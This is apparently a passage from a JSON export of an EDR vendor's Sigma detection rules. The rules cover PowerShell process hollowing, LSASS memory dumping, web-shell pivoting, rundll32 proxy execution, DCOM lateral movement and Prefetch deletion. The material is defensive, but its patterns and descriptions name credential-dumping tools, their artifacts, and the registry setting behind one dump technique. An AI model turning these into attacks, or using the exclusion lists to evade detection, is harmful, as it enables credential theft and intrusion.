'VirtualAllocEx($hProcess,$pProcessParameters,$ProcParamsLength,0x3000,0x4)'\n\n selection_strings:\n PowershellCommand|contains:\n - 'but really the user should drink more coffee'\n - 'Kind of whack but unsure how to translate properly'\n - '[+] Allocated memory in the Hollow'\n - 'Some proper ghetto PE parsing'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "af55dc31-5d7c-4332-a872-fccbee512a84",
"rule_name": "Process Hollowed via PowerShell",
"rule_description": "Detects suspicious PowerShell patterns from open-source PowerShell scripts used for Process Hollowing.\nProcess Hollowing is a technique for injecting code into processes to evade defenses by avoiding to write a malicious binary to disk.\nIt consists in creating a new process in a suspended state from a targeted legitimate process in order to unmap some or all of its memory, and replace it with malicious code.\nIt is recommended to investigate this script and the parent processes of the PowerShell interpreter that executed it to determine if the process injection was successful and to search for any malicious activity.\n",
"rule_creation_date": "2024-04-18",
"rule_modified_date": "2025-01-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055",
"attack.t1055.002",
"attack.t1055.003",
"attack.t1055.012",
"attack.t1055.013",
"attack.t1059.001",
"attack.t1106"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "af913938-1bde-4c8e-ab59-8a1108c63563",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075329Z",
"creation_date": "2026-03-23T11:45:34.075333Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075338Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/D1rkMtr/DumpThatLSASS",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_lsass_file_dumpthatlsass.yml",
"content": "title: LSASS Memory Dumped via DumpThatLSASS\nid: af913938-1bde-4c8e-ab59-8a1108c63563\ndescription: |\n Detects a suspicious attempt to dump LSASS process memory using DumpThatLSASS tool.\n Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\n By default this tool dump LSASS into a file named c4dd2a46-ceeb-425d-8dcb-ae21b341ca45.tmp.\n It is recommended to analyze the process responsible for writing this file to disk, to look for other malicious actions on the host and to start memory forensics to determine stolen credentials.\nreferences:\n - https://github.com/D1rkMtr/DumpThatLSASS\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2022/10/27\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - classification.Windows.Source.Filesystem\n - classification.Windows.HackTool.DumpThatLSASS\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.LSASSAccess\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path|endswith: '\\c4dd2a46-ceeb-425d-8dcb-ae21b341ca45.tmp'\n\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "af913938-1bde-4c8e-ab59-8a1108c63563",
"rule_name": "LSASS Memory Dumped via DumpThatLSASS",
"rule_description": "Detects a suspicious attempt to dump LSASS process memory using DumpThatLSASS tool.\nAdversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\nBy default this tool dump LSASS into a file named c4dd2a46-ceeb-425d-8dcb-ae21b341ca45.tmp.\nIt is recommended to analyze the process responsible for writing this file to disk, to look for other malicious actions on the host and to start memory forensics to determine stolen credentials.\n",
"rule_creation_date": "2022-10-27",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "afa806a4-ff77-4aad-81ce-cf445b4bd002",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087421Z",
"creation_date": "2026-03-23T11:45:34.087424Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087431Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/sensepost/reGeorg/tree/master",
"https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/",
"https://www.cert.ssi.gouv.fr/cti/CERTFR-2023-CTI-009/",
"https://attack.mitre.org/techniques/T1505/003/"
],
"name": "t1505_003_suspicious_network_connection_from_webserver_linux.yml",
"content": "title: Suspicious Network Activity from Web Server (Linux)\nid: afa806a4-ff77-4aad-81ce-cf445b4bd002\ndescription: |\n Detects suspicious network communications by a web server related to a possible web shell.\n Adversaries may backdoor web servers with web shells to establish persistent access to systems or to move laterally within a network.\n Tools like reGeorg can be used by attackers to pivot inside the compromised environment.\n It is recommended to verify the legitimacy of this network connection and check any other command executed by the web server.\nreferences:\n - https://github.com/sensepost/reGeorg/tree/master\n - https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/\n - https://www.cert.ssi.gouv.fr/cti/CERTFR-2023-CTI-009/\n - https://attack.mitre.org/techniques/T1505/003/\ndate: 2023/10/27\nmodified: 2025/07/29\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1505.003\n - attack.lateral_movement\n - attack.t1021\n - classification.Linux.Source.NetworkActivity\n - classification.Linux.Behavior.Persistence\n - classification.Linux.Behavior.Lateralization\n - classification.Linux.Behavior.RemoteShell\nlogsource:\n category: network_connection\n product: linux\ndetection:\n selection_dst_port:\n DestinationPort:\n - '22'\n - '445'\n - '3389'\n Initiated: 'true'\n\n selection_webserver_common:\n ProcessImage|endswith:\n - '/apache2'\n - '/httpd'\n - '/nginx'\n - '/php-fpm'\n # NOTE: On Ubuntu, php-fpm have its version as a suffix...\n - '*php-fpm*'\n\n selection_webserver_tomcat:\n # NOTE: Tomcat is executed via java and its main class is 'org.apache.catalina.startup.Bootstrap'\n ProcessParentImage|endswith: 'java'\n ProcessParentCommandLine|contains: 'org.apache.catalina.startup.Bootstrap'\n\n exclusion_loopback_connection:\n SourceIp:\n - '::1'\n - '::ffff:7f00:1'\n - '127.0.0.1'\n - '::ffff:127.0.0.1'\n DestinationIp:\n - '::1'\n - '127.0.0.1'\n - '::ffff:7f00:1'\n - '::ffff:127.0.0.1'\n\n condition: selection_dst_port and 1 of selection_webserver_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "afa806a4-ff77-4aad-81ce-cf445b4bd002",
"rule_name": "Suspicious Network Activity from Web Server (Linux)",
"rule_description": "Detects suspicious network communications by a web server related to a possible web shell.\nAdversaries may backdoor web servers with web shells to establish persistent access to systems or to move laterally within a network.\nTools like reGeorg can be used by attackers to pivot inside the compromised environment.\nIt is recommended to verify the legitimacy of this network connection and check any other command executed by the web server.\n",
"rule_creation_date": "2023-10-27",
"rule_modified_date": "2025-07-29",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1021",
"attack.t1505.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "afbdfb71-0e3c-43c6-94dc-f175f223b21d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079744Z",
"creation_date": "2026-03-23T11:45:34.079746Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079751Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Libraries/Zipfldr/",
"https://attack.mitre.org/techniques/T1218/011/"
],
"name": "t1218_011_rundll32_zipfldr_proxy_execution.yml",
"content": "title: Proxy Execution via zipfldr.dll\nid: afbdfb71-0e3c-43c6-94dc-f175f223b21d\ndescription: |\n Detects a suspicious invocation of zipfldr.dll by rundll32.\n Adversaries may abuse rundll32.exe to proxy execution of malicious code.\n Using rundll32.exe to execute malicious code indirectly (by calling zipfldr.dll's RouteTheCall function) may avoid detection by security tools. This is because some security solutions whitelist rundll32.exe as a legitimate Windows process or generate too many false positives from its normal baseline activity to effectively monitor it.\n It is recommended to investigate the legitimacy of the process responsible for the execution of rundll32 and to analyze its child processes.\nreferences:\n - https://lolbas-project.github.io/lolbas/Libraries/Zipfldr/\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2025/10/17\nmodified: 2025/10/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1216.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Zipfldr\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n ProcessParentOriginalFileName: 'rundll32.exe'\n ParentCommandLine|contains:\n - ' zipfldr,'\n - ' zipfldr.dll,'\n\n selection_function:\n ParentCommandLine|contains: 'RouteTheCall'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "afbdfb71-0e3c-43c6-94dc-f175f223b21d",
"rule_name": "Proxy Execution via zipfldr.dll",
"rule_description": "Detects a suspicious invocation of zipfldr.dll by rundll32.\nAdversaries may abuse rundll32.exe to proxy execution of malicious code.\nUsing rundll32.exe to execute malicious code indirectly (by calling zipfldr.dll's RouteTheCall function) may avoid detection by security tools. This is because some security solutions whitelist rundll32.exe as a legitimate Windows process or generate too many false positives from its normal baseline activity to effectively monitor it.\nIt is recommended to investigate the legitimacy of the process responsible for the execution of rundll32 and to analyze its child processes.\n",
"rule_creation_date": "2025-10-17",
"rule_modified_date": "2025-10-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1216.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "afc0aad4-2a07-40e8-bf67-4e0056e60353",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090461Z",
"creation_date": "2026-03-23T11:45:34.090463Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090467Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.deepinstinct.com/blog/forget-psexec-dcom-upload-execute-backdoor",
"https://github.com/deepinstinct/DCOMUploadExec",
"https://attack.mitre.org/techniques/T1021/003/"
],
"name": "t1021_003_dcom_imsiserver_upload_execute.yml",
"content": "title: DCOM Upload and Execute via IMsiServer\nid: afc0aad4-2a07-40e8-bf67-4e0056e60353\ndescription: |\n Detects a suspicious inbound connection to an MSI Custom Action Server.\n This is unusual behavior which could indicate lateral movement using the IMsiServer DCOM interface.\n It is recommended to investigate the \"MsiExec.exe\" process for suspicious activities and pivot on the source IP if possible.\nreferences:\n - https://www.deepinstinct.com/blog/forget-psexec-dcom-upload-execute-backdoor\n - https://github.com/deepinstinct/DCOMUploadExec\n - https://attack.mitre.org/techniques/T1021/003/\ndate: 2024/12/12\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.003\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.HackTool.DCOMUploadExec\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: network_connection\ndetection:\n selection:\n ProcessCommandLine|startswith:\n - '?:\\Windows\\System32\\MsiExec.exe -Embedding' # Custom Action Server\n - '?:\\Windows\\syswow64\\MsiExec.exe -Embedding'\n ProcessParentCommandLine: '?:\\Windows\\system32\\msiexec.exe /V' # MsiServer\n ProcessGrandparentImage: '?:\\Windows\\System32\\services.exe'\n Initiated: 'false'\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "afc0aad4-2a07-40e8-bf67-4e0056e60353",
"rule_name": "DCOM Upload and Execute via IMsiServer",
"rule_description": "Detects a suspicious inbound connection to an MSI Custom Action Server.\nThis is unusual behavior which could indicate lateral movement using the IMsiServer DCOM interface.\nIt is recommended to investigate the \"MsiExec.exe\" process for suspicious activities and pivot on the source IP if possible.\n",
"rule_creation_date": "2024-12-12",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "afc3222f-d83e-4ccf-9d72-3f2d046df5c7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.450440Z",
"creation_date": "2026-03-23T11:45:34.620206Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620210Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.trustedsec.com/blog/prefetch-the-little-snitch-that-tells-on-you/",
"https://attack.mitre.org/techniques/T1070/004/"
],
"name": "t1070_004_prefetch_deleted.yml",
"content": "title: Prefetch File Deleted\nid: afc3222f-d83e-4ccf-9d72-3f2d046df5c7\ndescription: |\n Detects the deletion of a Prefetch file.\n Prefetch files are useful forensics artifacts allowing the investigation of applications that have recently run on a Windows system.\n Adversaries may delete these files to cover their tracks and disrupt incident response or forensic analysis.\n It is recommended to investigate the deletion activity, check for missing Prefetch files in the \"%ProgramFiles%\\WindowsResources\\Prefetch\" directory and review the user or process responsible.\n It is common for administrators to execute cleanup scripts from RMM solutions that delete Prefetch files.\n If this is recurrent in your environment, it is highly recommended to whitelist this alert.\nreferences:\n - https://www.trustedsec.com/blog/prefetch-the-little-snitch-that-tells-on-you/\n - https://attack.mitre.org/techniques/T1070/004/\ndate: 2023/09/15\nmodified: 2026/03/20\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.004\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Deletion\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: file_remove\ndetection:\n selection:\n Path: '?:\\Windows\\Prefetch\\\\*.pf'\n ProcessParentImage|startswith: '?:\\'\n\n exclusion_svchost:\n ProcessCommandLine:\n - '?:\\windows\\system32\\svchost.exe -k LocalSystemNetworkRestricted'\n - '?:\\windows\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p'\n - '?:\\windows\\system32\\svchost.exe -k LocalSystemNetworkRestricted -s SysMain'\n - '?:\\windows\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p -s SysMain'\n - '?:\\windows\\system32\\svchost.exe -k sysmain'\n - '?:\\windows\\system32\\svchost.exe -k sysmain -p'\n - '?:\\windows\\system32\\svchost.exe -k sysmain -p -s SysMain'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_explorer:\n - ProcessImage: '?:\\Windows\\explorer.exe'\n ProcessParentImage: '?:\\Windows\\System32\\userinit.exe'\n - ProcessCommandLine: '?:\\WINDOWS\\explorer.exe /factory,{????????-????-????-????-????????????} -Embedding'\n ProcessParentImage: '?:\\Windows\\System32\\svchost.exe'\n\n exclusion_program_files:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - '?:\\Windows\\Downloaded Program Files\\' # ActiveX\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_sysprep:\n ProcessOriginalFileName: 'sysprep.EXE'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_wisecleaner:\n ProcessOriginalFileName: 'WiseDiskCleaner.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Lespeed Technology Co., Ltd'\n\n exclusion_sysinfocap:\n ProcessOriginalFileName: 'SysInfoCap.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'HP Inc.'\n\n exclusion_revounin:\n ProcessOriginalFileName: 'RevoUnin.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'VS Revo Group Ltd.'\n - 'VS REVO GROUP OOD'\n\n exclusion_ccleaner:\n ProcessOriginalFileName: 'ccleaner.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'PIRIFORM SOFTWARE LIMITED'\n - 'Gen Digital Inc.'\n\n exclusion_ccleaner_nosign:\n ProcessOriginalFileName: 'ccleaner.exe'\n ProcessCompany: 'Piriform Software Ltd'\n ProcessProduct: 'CCleaner'\n\n exclusion_manager_service:\n ProcessOriginalFileName: 'MSPCManagerService.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_avira:\n ProcessOriginalFileName: 'Service.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Avira Operations GmbH'\n\n exclusion_bleachbit:\n ProcessOriginalFileName: 'bleachbit.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Andrew Ziem'\n - 'Open Source Developer, Andrew Ziem'\n\n exclusion_dism1:\n ProcessOriginalFileName: 'Dism++.exe'\n ProcessCompany: 'Chuyu Team'\n ProcessProduct: 'Dism++'\n exclusion_dism2:\n ProcessImage|endswith: '\\Dism++x64.exe'\n ProcessOriginalFileName: ''\n ProcessCompany: ''\n\n exclusion_emjysoft:\n ProcessDescription: 'Emjysoft Cleaner'\n ProcessSigned: 'true'\n ProcessSignature: 'Emjysoft'\n\n exclusion_novell:\n - ProcessAncestors|contains: '?:\\Program Files (x86)\\Novell\\ZENworks\\bin\\handlers\\runscriptenf.exe'\n - ProcessCurrentDirectory: '?:\\Program Files (x86)\\Novell\\ZENworks\\'\n ProcessCommandLine|contains: '\\zen_executeRunscript_'\n\n exclusion_cleanmgr:\n ProcessOriginalFileName: 'Cleanmgr+.exe'\n ProcessCompany: 'Builtbybel'\n ProcessProduct: 'Cleanmgr+'\n\n exclusion_syscleanpro:\n ProcessOriginalFileName: 'SysCleanPro.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Beijing Qihu Technology Co., Ltd.'\n\n exclusion_pdgdeployrunner:\n ProcessParentImage: '?:\\Windows\\AdminArsenal\\PDQDeployRunner\\service-1\\PDQDeployRunner-1.exe'\n\n exclusion_screenshotx:\n ProcessParentImage: '?:\\Program Files (x86)\\ScreenshotX\\Uninstall.exe'\n\n exclusion_bcuninstaller:\n ProcessOriginalFileName: 'BCUninstaller.dll'\n ProcessSigned: 'true'\n ProcessSignature: 'Open Source Developer, Marcin Szeniak'\n\n exclusion_mspcmanagercore:\n ProcessOriginalFileName: 'MSPCManagerCore.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n # https://strontic.github.io/xcyclopedia/library/clsid_3ad05575-8857-4850-9277-11b85bdb8e09.html\n exclusion_dllhost:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}'\n ProcessParentImage: '?:\\Windows\\System32\\svchost.exe'\n\n exclusion_iobit:\n ProcessOriginalFileName: 'IObitUninstaller.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'IObit CO., LTD'\n - 'IObit Co., Ltd.'\n\n exclusion_wisecare:\n ProcessOriginalFileName: 'Wise Care 365'\n ProcessSigned: 'true'\n ProcessSignature: 'Lespeed Technology Co., Ltd'\n\n exclusion_revounpro:\n ProcessOriginalFileName: 'RevoUnPro.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'VS REVO GROUP OOD'\n\n exclusion_centrastage:\n ProcessParentImage: '?:\\ProgramData\\CentraStage\\AEMAgent\\AEMAgent.exe'\n\n exclusion_ccm:\n ProcessAncestors|contains: '|?:\\Windows\\CCM\\CcmExec.exe|'\n\n exclusion_totalcmd64:\n ProcessOriginalFileName: 'totalcmd64.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Ghisler Software GmbH'\n\n exclusion_hibituninstaller:\n ProcessOriginalFileName: 'HiBitUninstaller'\n ProcessDescription: 'HiBit Uninstaller'\n ProcessCompany: 'HiBitSoftware'\n\n exclusion_wmi:\n ProcessImage: '?:\\Windows\\System32\\wsmprovhost.exe'\n ProcessParentCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k DcomLaunch -p'\n\n exclusion_wapt:\n ProcessGrandparentImage:\n - '?:\\Program Files (x86)\\wapt\\wapt-get.exe'\n - '?:\\Program Files (x86)\\wapt\\python.exe'\n\n exclusion_gdata:\n ProcessOriginalFileName: 'AVClean.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'G DATA CyberDefense AG'\n\n exclusion_superopsrmm:\n ProcessParentImage: '?:\\Program Files\\superopsrmm\\bin\\superops.exe'\n\n exclusion_sccm:\n ProcessAncestors|contains:\n - '?:\\MININT\\Tools\\X64\\TsManager.exe'\n - '?:\\MININT\\Tools\\X64\\TsmBootstrap.exe'\n\n condition: selection and not 1 of exclusion_*\nfalsepositives:\n - \"Custom cleanup scripts from RMM solutions that delete Prefetch files to save space.\"\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "afc3222f-d83e-4ccf-9d72-3f2d046df5c7",
"rule_name": "Prefetch File Deleted",
"rule_description": "Detects the deletion of a Prefetch file.\nPrefetch files are useful forensics artifacts allowing the investigation of applications that have recently run on a Windows system.\nAdversaries may delete these files to cover their tracks and disrupt incident response or forensic analysis.\nIt is recommended to investigate the deletion activity, check for missing Prefetch files in the \"%ProgramFiles%\\WindowsResources\\Prefetch\" directory and review the user or process responsible.\nIt is common for administrators to execute cleanup scripts from RMM solutions that delete Prefetch files.\nIf this is recurrent in your environment, it is highly recommended to whitelist this alert.\n",
"rule_creation_date": "2023-09-15",
"rule_modified_date": "2026-03-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b0120c9c-02c9-4ea2-bb67-0f50ff53427f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621043Z",
"creation_date": "2026-03-23T11:45:34.621045Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621049Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/deepinstinct/Lsass-Shtinkering",
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1112_registry_modification_lsass_shtinkering_specific.yml",
"content": "title: Suspicious Registry Modification Associated with LSASS Shtinkering\nid: b0120c9c-02c9-4ea2-bb67-0f50ff53427f\ndescription: |\n Detects a modification in the registry necessary for the LSASS Shtinkering dump method to work.\n LSASS Shtinkering is a LSASS dump technique that consists in sending a message to the Windows Error Reporting service to report an LSASS exception.\n This, along with the correct dump type set in the registry, will dump the LSASS process memory.\n This registry option might be enabled to aid Windows application developers with debugging.\n It is recommended to investigate the process performing the registry modification to determine its legitimacy, a legitimate context could be the debugging of an application.\nreferences:\n - https://github.com/deepinstinct/Lsass-Shtinkering\n - https://attack.mitre.org/techniques/T1112/\ndate: 2023/04/03\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\DumpType\\lsass.exe'\n Details: 'DWORD (0x00000002)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_regedit:\n ProcessImage: '?:\\Windows\\regedit.exe'\n\n exclusion_schedule:\n - ProcessParentCommandLine: '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - ProcessGrandparentCommandLine: '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n exclusion_amazon:\n ProcessCommandLine: 'powershell.exe -ExecutionPolicy RemoteSigned -file ?:\\Program Files\\Amazon\\Photon\\Bootstrap\\bootstrap.ps1'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
